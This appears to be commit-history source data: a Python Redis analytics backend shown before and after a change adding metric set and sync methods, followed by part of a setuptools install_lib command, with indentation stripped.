Version 2.0 (the "License"); you may not use this file
except in compliance with the License. You may obtain
a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
"""
from analytics.backends.base import BaseAnalyticsBackend
from nydus.db import create_cluster
from dateutil.relativedelta import relativedelta
from dateutil import rrule
import datetime
import itertools
import calendar
import types
class Redis(BaseAnalyticsBackend):
def __init__(self, settings, **kwargs):
nydus_hosts = {}
hosts = settings.get("hosts", [])
if not hosts:
raise Exception("No redis hosts specified")
for i, host in enumerate(hosts):
nydus_hosts[i] = host
defaults = settings.get(
"defaults",
{
'host': 'localhost',
'port': 6379,
})
self._analytics_backend = create_cluster({
'engine': 'nydus.db.backends.redis.Redis',
'router': 'nydus.db.routers.keyvalue.ConsistentHashingRouter',
'hosts': nydus_hosts,
'defaults': defaults,
})
super(Redis, self).__init__(settings, **kwargs)
def _get_closest_week(self, metric_date):
"""
Gets the closest monday to the date provided.
"""
#find the offset to the closest monday
days_after_monday = metric_date.isoweekday() - 1
return metric_date - datetime.timedelta(days=days_after_monday)
def _get_daily_metric_key(self, unique_identifier, metric_date):
"""
Redis key for daily metric
"""
return self._prefix + ":" + "user:%s:analy:%s" % (unique_identifier, metric_date.strftime("%y-%m"),)
def _get_weekly_metric_key(self, unique_identifier, metric_date):
"""
Redis key for weekly metric
"""
return self._prefix + ":" + "user:%s:analy:%s" % (unique_identifier, metric_date.strftime("%y"),)
def _get_daily_metric_name(self, metric, metric_date):
"""
Hash key for daily metric
"""
return "%s:%s" % (metric, metric_date.strftime("%y-%m-%d"),)
def _get_weekly_metric_name(self, metric, metric_date):
"""
Hash key for weekly metric
"""
return "%s:%s" % (metric, metric_date.strftime("%y-%m-%d"),)
def _get_monthly_metric_name(self, metric, metric_date):
"""
Hash key for monthly metric
"""
return "%s:%s" % (metric, metric_date.strftime("%y-%m"),)
def _get_daily_date_range(self, metric_date, delta):
"""
Get the range of months that we need to use as keys to scan redis.
"""
dates = [metric_date]
start_date = metric_date
end_date = metric_date + delta
while start_date.month < end_date.month or start_date.year < end_date.year:
days_in_month = calendar.monthrange(start_date.year, start_date.month)[1]
#shift along to the next month as one of the months we will have to see. We don't care that the exact date
#is the 1st in each subsequent date range as we only care about the year and the month
start_date = start_date + datetime.timedelta(days=days_in_month - start_date.day + 1)
dates.append(start_date)
return dates
def _get_weekly_date_range(self, metric_date, delta):
"""
Gets the range of years that we need to use as keys to get metrics from redis.
"""
dates = [metric_date]
end_date = metric_date + delta
#Figure out how many years our metric range spans
spanning_years = end_date.year - metric_date.year
for i in range(spanning_years):
#for the weekly keys, we only care about the year
dates.append(
datetime.date(
year=metric_date.year + (i + 1), month=1, day=1))
return dates
def _parse_and_process_metrics(self, series, list_of_metrics):
formatted_result_list = []
series = [dt.strftime("%Y-%m-%d") for dt in series]
for result in list_of_metrics:
values = {}
for index, date_string in enumerate(series):
values[date_string] = int(result[index]) if result[index] is not None else 0
formatted_result_list.append(values)
merged_values = reduce(
lambda a, b: dict((n, a.get(n, 0) + b.get(n, 0)) for n in set(a) | set(b)),
formatted_result_list)
return set(series), merged_values
def clear_all(self):
"""
Deletes all ``sandsnake`` related data from redis.
.. warning::
Very expensive and destructive operation. Use with causion
"""
keys = self._analytics_backend.keys()
for key in itertools.chain(*keys):
with self._analytics_backend.map() as conn:
if key.startswith(self._prefix):
conn.delete(key)
def track_count(self, unique_identifier, metric, inc_amt=1, **kwargs):
"""
Tracks a metric just by count. If you track a metric this way, you won't be able
to query the metric by day, week or month.
:param unique_identifier: Unique string indetifying the object this metric is for
:param metric: A unique name for the metric you want to track
:param inc_amt: The amount you want to increment the ``metric`` for the ``unique_identifier``
:return: ``True`` if successful ``False`` otherwise
"""
return self._analytics_backend.incr(self._prefix + ":" + "analy:%s:count:%s" % (unique_identifier, metric), inc_amt)
def track_metric(self, unique_identifier, metric, date, inc_amt=1, **kwargs):
"""
Tracks a metric for a specific ``unique_identifier`` for a certain date. The redis backend supports
lists for both ``unique_identifier`` and ``metric`` allowing for tracking of multiple metrics for multiple
unique_identifiers efficiently. Not all backends may support this.
TODO: Possibly default date to the current date.
:param unique_identifier: Unique string indetifying the object this metric is for
:param metric: A unique name for the metric you want to track. This can be a list or a string.
:param date: A python date object indicating when this event occured
:param inc_amt: The amount you want to increment the ``metric`` for the ``unique_identifier``
:return: ``True`` if successful ``False`` otherwise
"""
metric = [metric] if isinstance(metric, basestring) else metric
unique_identifier = [unique_identifier] if not isinstance(unique_identifier, (types.ListType, types.TupleType, types.GeneratorType,)) else unique_identifier
results = []
with self._analytics_backend.map() as conn:
for uid in unique_identifier:
hash_key_daily = self._get_daily_metric_key(uid, date)
closest_monday = self._get_closest_week(date)
hash_key_weekly = self._get_weekly_metric_key(uid, date)
for single_metric in metric:
daily_metric_name = self._get_daily_metric_name(single_metric, date)
weekly_metric_name = self._get_weekly_metric_name(single_metric, closest_monday)
monthly_metric_name = self._get_monthly_metric_name(single_metric, date)
results.append(
[
conn.hincrby(hash_key_daily, daily_metric_name, inc_amt),
conn.hincrby(hash_key_weekly, weekly_metric_name, inc_amt),
conn.hincrby(hash_key_weekly, monthly_metric_name, inc_amt),
conn.incr(self._prefix + ":" + "analy:%s:count:%s" % (uid, single_metric), inc_amt)
]
)
return results
def get_metric_by_day(self, unique_identifier, metric, from_date, limit=30, **kwargs):
"""
Returns the ``metric`` for ``unique_identifier`` segmented by day
starting from``from_date``
:param unique_identifier: Unique string indetifying the object this metric is for
:param metric: A unique name for the metric you want to track
:param from_date: A python date object
:param limit: The total number of days to retrive starting from ``from_date``
"""
conn = kwargs.get("connection", None)
date_generator = (from_date + datetime.timedelta(days=i) for i in itertools.count())
metric_key_date_range = self._get_daily_date_range(from_date, datetime.timedelta(days=limit))
#generate a list of mondays in between the start date and the end date
series = list(itertools.islice(date_generator, limit))
metric_keys = [self._get_daily_metric_name(metric, daily_date) for daily_date in series]
metric_func = lambda conn: [conn.hmget(self._get_daily_metric_key(unique_identifier, \
metric_key_date), metric_keys) for metric_key_date in metric_key_date_range]
if conn is not None:
results = metric_func(conn)
else:
with self._analytics_backend.map() as conn:
results = metric_func(conn)
series, results = self._parse_and_process_metrics(series, results)
return series, results
def get_metric_by_week(self, unique_identifier, metric, from_date, limit=10, **kwargs):
"""
Returns the ``metric`` for ``unique_identifier`` segmented by week
starting from``from_date``
:param unique_identifier: Unique string indetifying the object this metric is for
:param metric: A unique name for the metric you want to track
:param from_date: A python date object
:param limit: The total number of weeks to retrive starting from ``from_date``
"""
conn = kwargs.get("connection", None)
closest_monday_from_date = self._get_closest_week(from_date)
metric_key_date_range = self._get_weekly_date_range(closest_monday_from_date, datetime.timedelta(weeks=limit))
date_generator = (closest_monday_from_date + datetime.timedelta(days=i) for i in itertools.count(step=7))
#generate a list of mondays in between the start date and the end date
series = list(itertools.islice(date_generator, limit))
metric_keys = [self._get_weekly_metric_name(metric, monday_date) for monday_date in series]
metric_func = lambda conn: [conn.hmget(self._get_weekly_metric_key(unique_identifier, \
metric_key_date), metric_keys) for metric_key_date in metric_key_date_range]
if conn is not None:
results = metric_func(conn)
else:
with self._analytics_backend.map() as conn:
results = metric_func(conn)
series, results = self._parse_and_process_metrics(series, results)
return series, results
def get_metric_by_month(self, unique_identifier, metric, from_date, limit=10, **kwargs):
"""
Returns the ``metric`` for ``unique_identifier`` segmented by month
starting from``from_date``. It will retrieve metrics data starting from the 1st of the
month specified in ``from_date``
:param unique_identifier: Unique string indetifying the object this metric is for
:param metric: A unique name for the metric you want to track
:param from_date: A python date object
:param limit: The total number of months to retrive starting from ``from_date``
"""
conn = kwargs.get("connection", None)
first_of_month = datetime.date(year=from_date.year, month=from_date.month, day=1)
metric_key_date_range = self._get_weekly_date_range(
first_of_month, relativedelta(months=limit))
date_generator = (first_of_month + relativedelta(months=i) for i in itertools.count())
#generate a list of mondays in between the start date and the end date
series = list(itertools.islice(date_generator, limit))
metric_keys = [self._get_monthly_metric_name(metric, month_date) for month_date in series]
metric_func = lambda conn: [conn.hmget(
self._get_weekly_metric_key(
unique_identifier, metric_key_date), metric_keys) for metric_key_date in metric_key_date_range]
if conn is not None:
results = metric_func(conn)
else:
with self._analytics_backend.map() as conn:
results = metric_func(conn)
series, results = self._parse_and_process_metrics(series, results)
return series, results
def get_metrics(self, metric_identifiers, from_date, limit=10, group_by="week", **kwargs):
"""
Retrieves a multiple metrics as efficiently as possible.
:param metric_identifiers: a list of tuples of the form `(unique_identifier, metric_name`) identifying which metrics to retrieve.
For example [('user:1', 'people_invited',), ('user:2', 'people_invited',), ('user:1', 'comments_posted',), ('user:2', 'comments_posted',)]
:param from_date: A python date object
:param limit: The total number of months to retrive starting from ``from_date``
:param group_by: The type of aggregation to perform on the metric. Choices are: ``day``, ``week`` or ``month``
"""
results = []
#validation of types:
allowed_types = {
"day": self.get_metric_by_day,
"week": self.get_metric_by_week,
"month": self.get_metric_by_month,
}
if group_by.lower() not in allowed_types:
raise Exception("Allowed values for group_by are day, week or month.")
group_by_func = allowed_types[group_by.lower()]
#pass a connection object so we can pipeline as much as possible
with self._analytics_backend.map() as conn:
for unique_identifier, metric in metric_identifiers:
results.append(group_by_func(unique_identifier, metric, from_date, limit=limit, connection=conn))
#we have to merge all the metric results afterwards because we are using a custom context processor
return [
self._parse_and_process_metrics(series, list_of_metrics) for
series, list_of_metrics in results]
def get_count(self, unique_identifier, metric, start_date=None, end_date=None, **kwargs):
"""
Gets the count for the ``metric`` for ``unique_identifier``. You can specify a ``start_date``
and an ``end_date``, to only get metrics within that time range.
:param unique_identifier: Unique string indetifying the object this metric is for
:param metric: A unique name for the metric you want to track
:param start_date: Get the specified metrics after this date
:param end_date: Get the sepcified metrics before this date
:return: The count for the metric, 0 otherwise
"""
result = None
if start_date and end_date:
start_date, end_date = (start_date, end_date,) if start_date < end_date else (end_date, start_date,)
start_date = start_date if hasattr(start_date, 'date') else datetime.datetime.combine(start_date, datetime.time())
end_date = end_date if hasattr(end_date, 'date') else datetime.datetime.combine(end_date, datetime.time())
monthly_metrics_dates = list(rrule.rrule(rrule.MONTHLY, dtstart=start_date, bymonthday=1, until=end_date))
#We can sorta optimize this by getting most of the data by month
if len(monthly_metrics_dates) >= 3:
start_diff = monthly_metrics_dates[0] - start_date
end_diff = end_date - monthly_metrics_dates[-1]
with self._analytics_backend.map() as conn:
monthly_metric_series, monthly_metric_results = self.get_metric_by_month(unique_identifier, metric, monthly_metrics_dates[0], limit=len(monthly_metrics_dates) - 1, connection=conn)
#get the difference from the date to the start date and get all dates in between
starting_metric_series, starting_metric_results = self.get_metric_by_day(unique_identifier, metric, start_date, limit=start_diff.days, connection=conn) if start_diff.days > 0 else ([], [[]],)
ending_metric_series, ending_metric_results = self.get_metric_by_day(unique_identifier, metric, monthly_metrics_dates[-1], limit=end_diff.days + 1, connection=conn)
monthly_metric_series, monthly_metric_results = self._parse_and_process_metrics(monthly_metric_series, monthly_metric_results)
starting_metric_series, starting_metric_results = self._parse_and_process_metrics(starting_metric_series, starting_metric_results)
ending_metric_series, ending_metric_results = self._parse_and_process_metrics(ending_metric_series, ending_metric_results)
result = sum(monthly_metric_results.values()) + sum(starting_metric_results.values()) + sum(ending_metric_results.values())
else:
diff = end_date - start_date
metric_results = self.get_metric_by_day(unique_identifier, metric, start_date, limit=diff.days + 1)
result = sum(metric_results[1].values())
else:
try:
result = int(self._analytics_backend.get(self._prefix + ":" + "analy:%s:count:%s" % (unique_identifier, metric,)))
except TypeError:
result = 0
return result
def get_counts(self, metric_identifiers, **kwargs):
"""
Retrieves a multiple metrics as efficiently as possible.
:param metric_identifiers: a list of tuples of the form `(unique_identifier, metric_name`) identifying which metrics to retrieve.
For example [('user:1', 'people_invited',), ('user:2', 'people_invited',), ('user:1', 'comments_posted',), ('user:2', 'comments_posted',)]
"""
parsed_results = []
with self._analytics_backend.map() as conn:
results = [
conn.get(self._prefix + ":" + "analy:%s:count:%s" % (unique_identifier, metric,)) for
unique_identifier, metric in metric_identifiers]
for result in results:
try:
parsed_result = int(result)
except TypeError:
parsed_result = 0
parsed_results.append(parsed_result)
return parsed_results
Finish initial implementation of sync and set.
"""
Copyright 2012 Numan Sachwani <numan@7Geese.com>
This file is provided to you under the Apache License,
Version 2.0 (the "License"); you may not use this file
except in compliance with the License. You may obtain
a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
"""
from analytics.backends.base import BaseAnalyticsBackend
from nydus.db import create_cluster
from calendar import monthrange
from dateutil.relativedelta import relativedelta
from dateutil import rrule
import datetime
import itertools
import calendar
import types
class Redis(BaseAnalyticsBackend):
def __init__(self, settings, **kwargs):
nydus_hosts = {}
hosts = settings.get("hosts", [])
if not hosts:
raise Exception("No redis hosts specified")
for i, host in enumerate(hosts):
nydus_hosts[i] = host
defaults = settings.get(
"defaults",
{
'host': 'localhost',
'port': 6379,
})
self._analytics_backend = create_cluster({
'engine': 'nydus.db.backends.redis.Redis',
'router': 'nydus.db.routers.keyvalue.ConsistentHashingRouter',
'hosts': nydus_hosts,
'defaults': defaults,
})
super(Redis, self).__init__(settings, **kwargs)
def _get_closest_week(self, metric_date):
"""
Gets the closest monday to the date provided.
"""
#find the offset to the closest monday
days_after_monday = metric_date.isoweekday() - 1
return metric_date - datetime.timedelta(days=days_after_monday)
def _get_daily_metric_key(self, unique_identifier, metric_date):
"""
Redis key for daily metric
"""
return self._prefix + ":" + "user:%s:analy:%s" % (unique_identifier, metric_date.strftime("%y-%m"),)
def _get_weekly_metric_key(self, unique_identifier, metric_date):
"""
Redis key for weekly metric
"""
return self._prefix + ":" + "user:%s:analy:%s" % (unique_identifier, metric_date.strftime("%y"),)
def _get_daily_metric_name(self, metric, metric_date):
"""
Hash key for daily metric
"""
return "%s:%s" % (metric, metric_date.strftime("%y-%m-%d"),)
def _get_weekly_metric_name(self, metric, metric_date):
"""
Hash key for weekly metric
"""
return "%s:%s" % (metric, metric_date.strftime("%y-%m-%d"),)
def _get_monthly_metric_name(self, metric, metric_date):
"""
Hash key for monthly metric
"""
return "%s:%s" % (metric, metric_date.strftime("%y-%m"),)
def _get_daily_date_range(self, metric_date, delta):
"""
Get the range of months that we need to use as keys to scan redis.
"""
dates = [metric_date]
start_date = metric_date
end_date = metric_date + delta
while start_date.month < end_date.month or start_date.year < end_date.year:
days_in_month = calendar.monthrange(start_date.year, start_date.month)[1]
#shift along to the next month as one of the months we will have to see. We don't care that the exact date
#is the 1st in each subsequent date range as we only care about the year and the month
start_date = start_date + datetime.timedelta(days=days_in_month - start_date.day + 1)
dates.append(start_date)
return dates
def _get_weekly_date_range(self, metric_date, delta):
"""
Gets the range of years that we need to use as keys to get metrics from redis.
"""
dates = [metric_date]
end_date = metric_date + delta
#Figure out how many years our metric range spans
spanning_years = end_date.year - metric_date.year
for i in range(spanning_years):
#for the weekly keys, we only care about the year
dates.append(
datetime.date(
year=metric_date.year + (i + 1), month=1, day=1))
return dates
def _parse_and_process_metrics(self, series, list_of_metrics):
formatted_result_list = []
series = [dt.strftime("%Y-%m-%d") for dt in series]
for result in list_of_metrics:
values = {}
for index, date_string in enumerate(series):
values[date_string] = int(result[index]) if result[index] is not None else 0
formatted_result_list.append(values)
merged_values = reduce(
lambda a, b: dict((n, a.get(n, 0) + b.get(n, 0)) for n in set(a) | set(b)),
formatted_result_list)
return set(series), merged_values
def _num_weeks(self, start_date, end_date):
closest_monday = self._get_closest_week(start_date)
return ((end_date - closest_monday).days / 7) + 1
def _num_months(self, start_date, end_date):
return ((end_date.year - start_date.year) * 12) + (end_date.month - start_date.month) + 1
def clear_all(self):
"""
Deletes all ``sandsnake`` related data from redis.
.. warning::
Very expensive and destructive operation. Use with causion
"""
keys = self._analytics_backend.keys()
for key in itertools.chain(*keys):
with self._analytics_backend.map() as conn:
if key.startswith(self._prefix):
conn.delete(key)
def track_count(self, unique_identifier, metric, inc_amt=1, **kwargs):
"""
Tracks a metric just by count. If you track a metric this way, you won't be able
to query the metric by day, week or month.
:param unique_identifier: Unique string indetifying the object this metric is for
:param metric: A unique name for the metric you want to track
:param inc_amt: The amount you want to increment the ``metric`` for the ``unique_identifier``
:return: ``True`` if successful ``False`` otherwise
"""
return self._analytics_backend.incr(self._prefix + ":" + "analy:%s:count:%s" % (unique_identifier, metric), inc_amt)
def track_metric(self, unique_identifier, metric, date, inc_amt=1, **kwargs):
"""
Tracks a metric for a specific ``unique_identifier`` for a certain date. The redis backend supports
lists for both ``unique_identifier`` and ``metric`` allowing for tracking of multiple metrics for multiple
unique_identifiers efficiently. Not all backends may support this.
TODO: Possibly default date to the current date.
:param unique_identifier: Unique string indetifying the object this metric is for
:param metric: A unique name for the metric you want to track. This can be a list or a string.
:param date: A python date object indicating when this event occured
:param inc_amt: The amount you want to increment the ``metric`` for the ``unique_identifier``
:return: ``True`` if successful ``False`` otherwise
"""
metric = [metric] if isinstance(metric, basestring) else metric
unique_identifier = [unique_identifier] if not isinstance(unique_identifier, (types.ListType, types.TupleType, types.GeneratorType,)) else unique_identifier
results = []
with self._analytics_backend.map() as conn:
for uid in unique_identifier:
hash_key_daily = self._get_daily_metric_key(uid, date)
closest_monday = self._get_closest_week(date)
hash_key_weekly = self._get_weekly_metric_key(uid, date)
for single_metric in metric:
daily_metric_name = self._get_daily_metric_name(single_metric, date)
weekly_metric_name = self._get_weekly_metric_name(single_metric, closest_monday)
monthly_metric_name = self._get_monthly_metric_name(single_metric, date)
results.append(
[
conn.hincrby(hash_key_daily, daily_metric_name, inc_amt),
conn.hincrby(hash_key_weekly, weekly_metric_name, inc_amt),
conn.hincrby(hash_key_weekly, monthly_metric_name, inc_amt),
conn.incr(self._prefix + ":" + "analy:%s:count:%s" % (uid, single_metric), inc_amt)
]
)
return results
def get_metric_by_day(self, unique_identifier, metric, from_date, limit=30, **kwargs):
"""
Returns the ``metric`` for ``unique_identifier`` segmented by day
starting from``from_date``
:param unique_identifier: Unique string indetifying the object this metric is for
:param metric: A unique name for the metric you want to track
:param from_date: A python date object
:param limit: The total number of days to retrive starting from ``from_date``
"""
conn = kwargs.get("connection", None)
date_generator = (from_date + datetime.timedelta(days=i) for i in itertools.count())
metric_key_date_range = self._get_daily_date_range(from_date, datetime.timedelta(days=limit))
#generate a list of mondays in between the start date and the end date
series = list(itertools.islice(date_generator, limit))
metric_keys = [self._get_daily_metric_name(metric, daily_date) for daily_date in series]
metric_func = lambda conn: [conn.hmget(self._get_daily_metric_key(unique_identifier, \
metric_key_date), metric_keys) for metric_key_date in metric_key_date_range]
if conn is not None:
results = metric_func(conn)
else:
with self._analytics_backend.map() as conn:
results = metric_func(conn)
series, results = self._parse_and_process_metrics(series, results)
return series, results
def get_metric_by_week(self, unique_identifier, metric, from_date, limit=10, **kwargs):
"""
Returns the ``metric`` for ``unique_identifier`` segmented by week
starting from``from_date``
:param unique_identifier: Unique string indetifying the object this metric is for
:param metric: A unique name for the metric you want to track
:param from_date: A python date object
:param limit: The total number of weeks to retrive starting from ``from_date``
"""
conn = kwargs.get("connection", None)
closest_monday_from_date = self._get_closest_week(from_date)
metric_key_date_range = self._get_weekly_date_range(closest_monday_from_date, datetime.timedelta(weeks=limit))
date_generator = (closest_monday_from_date + datetime.timedelta(days=i) for i in itertools.count(step=7))
#generate a list of mondays in between the start date and the end date
series = list(itertools.islice(date_generator, limit))
metric_keys = [self._get_weekly_metric_name(metric, monday_date) for monday_date in series]
metric_func = lambda conn: [conn.hmget(self._get_weekly_metric_key(unique_identifier, \
metric_key_date), metric_keys) for metric_key_date in metric_key_date_range]
if conn is not None:
results = metric_func(conn)
else:
with self._analytics_backend.map() as conn:
results = metric_func(conn)
series, results = self._parse_and_process_metrics(series, results)
return series, results
def get_metric_by_month(self, unique_identifier, metric, from_date, limit=10, **kwargs):
"""
Returns the ``metric`` for ``unique_identifier`` segmented by month
starting from``from_date``. It will retrieve metrics data starting from the 1st of the
month specified in ``from_date``
:param unique_identifier: Unique string indetifying the object this metric is for
:param metric: A unique name for the metric you want to track
:param from_date: A python date object
:param limit: The total number of months to retrive starting from ``from_date``
"""
conn = kwargs.get("connection", None)
first_of_month = datetime.date(year=from_date.year, month=from_date.month, day=1)
metric_key_date_range = self._get_weekly_date_range(
first_of_month, relativedelta(months=limit))
date_generator = (first_of_month + relativedelta(months=i) for i in itertools.count())
#generate a list of first_of_month's in between the start date and the end date
series = list(itertools.islice(date_generator, limit))
metric_keys = [self._get_monthly_metric_name(metric, month_date) for month_date in series]
metric_func = lambda conn: [conn.hmget(
self._get_weekly_metric_key(
unique_identifier, metric_key_date), metric_keys) for metric_key_date in metric_key_date_range]
if conn is not None:
results = metric_func(conn)
else:
with self._analytics_backend.map() as conn:
results = metric_func(conn)
series, results = self._parse_and_process_metrics(series, results)
return series, results
def get_metrics(self, metric_identifiers, from_date, limit=10, group_by="week", **kwargs):
"""
Retrieves a multiple metrics as efficiently as possible.
:param metric_identifiers: a list of tuples of the form `(unique_identifier, metric_name`) identifying which metrics to retrieve.
For example [('user:1', 'people_invited',), ('user:2', 'people_invited',), ('user:1', 'comments_posted',), ('user:2', 'comments_posted',)]
:param from_date: A python date object
:param limit: The total number of months to retrive starting from ``from_date``
:param group_by: The type of aggregation to perform on the metric. Choices are: ``day``, ``week`` or ``month``
"""
results = []
#validation of types:
allowed_types = {
"day": self.get_metric_by_day,
"week": self.get_metric_by_week,
"month": self.get_metric_by_month,
}
if group_by.lower() not in allowed_types:
raise Exception("Allowed values for group_by are day, week or month.")
group_by_func = allowed_types[group_by.lower()]
#pass a connection object so we can pipeline as much as possible
with self._analytics_backend.map() as conn:
for unique_identifier, metric in metric_identifiers:
results.append(group_by_func(unique_identifier, metric, from_date, limit=limit, connection=conn))
#we have to merge all the metric results afterwards because we are using a custom context processor
return [
self._parse_and_process_metrics(series, list_of_metrics) for
series, list_of_metrics in results]
def get_count(self, unique_identifier, metric, start_date=None, end_date=None, **kwargs):
"""
Gets the count for the ``metric`` for ``unique_identifier``. You can specify a ``start_date``
and an ``end_date``, to only get metrics within that time range.
:param unique_identifier: Unique string indetifying the object this metric is for
:param metric: A unique name for the metric you want to track
:param start_date: Get the specified metrics after this date
:param end_date: Get the sepcified metrics before this date
:return: The count for the metric, 0 otherwise
"""
result = None
if start_date and end_date:
start_date, end_date = (start_date, end_date,) if start_date < end_date else (end_date, start_date,)
start_date = start_date if hasattr(start_date, 'date') else datetime.datetime.combine(start_date, datetime.time())
end_date = end_date if hasattr(end_date, 'date') else datetime.datetime.combine(end_date, datetime.time())
monthly_metrics_dates = list(rrule.rrule(rrule.MONTHLY, dtstart=start_date, bymonthday=1, until=end_date))
#We can sorta optimize this by getting most of the data by month
if len(monthly_metrics_dates) >= 3:
start_diff = monthly_metrics_dates[0] - start_date
end_diff = end_date - monthly_metrics_dates[-1]
with self._analytics_backend.map() as conn:
monthly_metric_series, monthly_metric_results = self.get_metric_by_month(unique_identifier, metric, monthly_metrics_dates[0], limit=len(monthly_metrics_dates) - 1, connection=conn)
#get the difference from the date to the start date and get all dates in between
starting_metric_series, starting_metric_results = self.get_metric_by_day(unique_identifier, metric, start_date, limit=start_diff.days, connection=conn) if start_diff.days > 0 else ([], [[]],)
ending_metric_series, ending_metric_results = self.get_metric_by_day(unique_identifier, metric, monthly_metrics_dates[-1], limit=end_diff.days + 1, connection=conn)
monthly_metric_series, monthly_metric_results = self._parse_and_process_metrics(monthly_metric_series, monthly_metric_results)
starting_metric_series, starting_metric_results = self._parse_and_process_metrics(starting_metric_series, starting_metric_results)
ending_metric_series, ending_metric_results = self._parse_and_process_metrics(ending_metric_series, ending_metric_results)
result = sum(monthly_metric_results.values()) + sum(starting_metric_results.values()) + sum(ending_metric_results.values())
else:
diff = end_date - start_date
metric_results = self.get_metric_by_day(unique_identifier, metric, start_date, limit=diff.days + 1)
result = sum(metric_results[1].values())
else:
try:
result = int(self._analytics_backend.get(self._prefix + ":" + "analy:%s:count:%s" % (unique_identifier, metric,)))
except TypeError:
result = 0
return result
def get_counts(self, metric_identifiers, **kwargs):
"""
Retrieves a multiple metrics as efficiently as possible.
:param metric_identifiers: a list of tuples of the form `(unique_identifier, metric_name`) identifying which metrics to retrieve.
For example [('user:1', 'people_invited',), ('user:2', 'people_invited',), ('user:1', 'comments_posted',), ('user:2', 'comments_posted',)]
"""
parsed_results = []
with self._analytics_backend.map() as conn:
results = [
conn.get(self._prefix + ":" + "analy:%s:count:%s" % (unique_identifier, metric,)) for
unique_identifier, metric in metric_identifiers]
for result in results:
try:
parsed_result = int(result)
except TypeError:
parsed_result = 0
parsed_results.append(parsed_result)
return parsed_results
def set_metric_by_day(self, unique_identifier, metric, date, count, sync_arg, **kwargs):
"""
Sets the count for the ``metric`` for ``unique_identifier``.
You must specify a ``date`` for the ``count`` to be set on.
The redis backend supports lists for both ``unique_identifier`` and ``metric`` allowing for the setting of
multiple metrics for multiple unique_identifiers efficiently. Not all backends may support this.
:param unique_identifier: Unique string indetifying the object this metric is for
:param metric: A unique name for the metric you want to track
:param date: Sets the specified metrics for this date
:param count: Sets the sepcified metrics to value of count
:param sync_arg: Boolean used to determine if week and month counters should be updated as well
"""
metric = [metric] if isinstance(metric, basestring) else metric
unique_identifier = [unique_identifier] if not isinstance(unique_identifier, (types.ListType, types.TupleType, types.GeneratorType,)) else unique_identifier
with self._analytics_backend.map() as conn:
for uid in unique_identifier:
hash_key_daily = self._get_daily_metric_key(uid, date)
for single_metric in metric:
daily_metric_name = self._get_daily_metric_name(single_metric, date)
conn.hset(hash_key_daily, daily_metric_name, count)
if sync_arg:
self.sync_agg_metric(unique_identifier, metric, date, date)
def sync_agg_metric(self, unique_identifier, metric, start_date, end_date, **kwargs):
"""
Uses the count for each day in the date range to recalculate the values for the associated weeks and months for
the ``metric`` for ``unique_identifier``.
:param unique_identifier: Unique string indetifying the object this metric is for
:param metric: A unique name for the metric you want to track
:param start_date: Date syncing starts
:param end_date: Date syncing end
"""
self.sync_week_metric(unique_identifier, metric, start_date, end_date)
self.sync_month_metric(unique_identifier, metric, start_date, end_date)
def sync_week_metric(self, unique_identifier, metric, start_date, end_date):
closest_monday_from_date = self._get_closest_week(start_date)
num_weeks = self._num_weeks(start_date, end_date)
metric_key_date_range = self._get_weekly_date_range(closest_monday_from_date, datetime.timedelta(weeks=num_weeks))
week_date_generator = (closest_monday_from_date + datetime.timedelta(days=i) for i in itertools.count(step=7))
#generate a list of mondays in between the start date and the end date
weeks_to_update = list(itertools.islice(week_date_generator, num_weeks))
for week in weeks_to_update:
week_counter = 0
for key, value in self.get_metric_by_day(unique_identifier, metric, week, 7)[1].items():
week_counter += value
hash_key_weekly = self._get_weekly_metric_key(unique_identifier, week)
weekly_metric_name = self._get_weekly_metric_name(metric, week)
with self._analytics_backend.map() as conn:
conn.hset(hash_key_weekly, weekly_metric_name, week_counter)
def sync_month_metric(self, unique_identifier, metric, start_date, end_date):
num_months = self._num_months(start_date, end_date)
first_of_month = datetime.date(year=start_date.year, month=start_date.month, day=1)
metric_key_date_range = self._get_weekly_date_range(
first_of_month, relativedelta(months=num_months))
month_date_generator = (first_of_month + relativedelta(months=i) for i in itertools.count())
#generate a list of first_of_month's in between the start date and the end date
months_to_update = list(itertools.islice(month_date_generator, num_months))
for month in months_to_update:
month_counter = 0
for key, value in self.get_metric_by_day(unique_identifier, metric, month, monthrange(month.year, month.month)[1])[1].items():
month_counter += value
hash_key_monthly = self._get_monthly_metric_name(unique_identifier, month)
monthly_metric_name = self._get_weekly_metric_name(metric, month)
with self._analytics_backend.map() as conn:
conn.hset(hash_key_monthly, monthly_metric_name, month_counter)
|
import distutils.command.install_lib as orig
import os, imp
class install_lib(orig.install_lib):
"""Don't add compiled flags to filenames of non-Python files"""
def run(self):
self.build()
outfiles = self.install()
if outfiles is not None:
# always compile, in case we have any extension stubs to deal with
self.byte_compile(outfiles)
def get_exclusions(self):
exclude = {}
nsp = self.distribution.namespace_packages
svem = (nsp and self.get_finalized_command('install')
.single_version_externally_managed)
if svem:
for pkg in nsp:
parts = pkg.split('.')
while parts:
pkgdir = os.path.join(self.install_dir, *parts)
for f in self._gen_exclude_names():
exclude[os.path.join(pkgdir, f)] = 1
parts.pop()
return exclude
@staticmethod
def _gen_exclude_names():
"""
Generate file paths to be excluded for namespace packages (bytecode
cache files).
"""
yield '__init__.py'
yield '__init__.pyc'
yield '__init__.pyo'
if not hasattr(imp, 'get_tag'):
return
yield os.path.join('__pycache__', '__init__.' + imp.get_tag() + '.pyc')
yield os.path.join('__pycache__', '__init__.' + imp.get_tag() + '.pyo')
def copy_tree(
self, infile, outfile,
preserve_mode=1, preserve_times=1, preserve_symlinks=0, level=1
):
assert preserve_mode and preserve_times and not preserve_symlinks
exclude = self.get_exclusions()
if not exclude:
return orig.install_lib.copy_tree(self, infile, outfile)
# Exclude namespace package __init__.py* files from the output
from setuptools.archive_util import unpack_directory
from distutils import log
outfiles = []
def pf(src, dst):
if dst in exclude:
log.warn("Skipping installation of %s (namespace package)",
dst)
return False
log.info("copying %s -> %s", src, os.path.dirname(dst))
outfiles.append(dst)
return dst
unpack_directory(infile, outfile, pf)
return outfiles
def get_outputs(self):
outputs = orig.install_lib.get_outputs(self)
exclude = self.get_exclusions()
if exclude:
return [f for f in outputs if f not in exclude]
return outputs
Extract calculation of base path
import distutils.command.install_lib as orig
import os, imp
class install_lib(orig.install_lib):
